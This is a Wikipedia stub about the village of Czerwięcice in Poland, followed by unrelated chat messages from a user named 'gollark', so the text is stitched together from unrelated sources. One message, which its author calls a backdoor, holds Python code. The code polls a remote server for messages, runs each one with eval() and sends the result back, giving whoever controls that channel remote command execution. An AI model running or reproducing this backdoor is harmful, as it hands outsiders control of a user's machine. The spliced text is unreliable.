Czerwięcice
Czerwięcice [t͡ʂɛrvjɛnˈt͡ɕit͡sɛ] (German: Czerwentzütz) is a village in the administrative district of Gmina Rudnik, within Racibórz County, Silesian Voivodeship, in southern Poland.[1] It lies approximately 4 kilometres (2 mi) north of Rudnik, 9 km (6 mi) north-west of Racibórz, and 60 km (37 mi) west of the regional capital Katowice.
Czerwięcice | |
---|---|
Village | |
Palace in Czerwięcice | |
Czerwięcice | |
Coordinates: 50°9′28″N 18°11′2″E | |
Country | |
Voivodeship | Silesian |
County | Racibórz |
Gmina | Rudnik |
Population | 130 |
The village has a population of 130.
Gallery
- Countryside
- Farm
- Bus stop
gollark: Railguns, mostly.
gollark: Why don't *you*?
gollark: It would be nice if they painted them different colours or something.
gollark: This may slightly be a backdoor somewhat.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.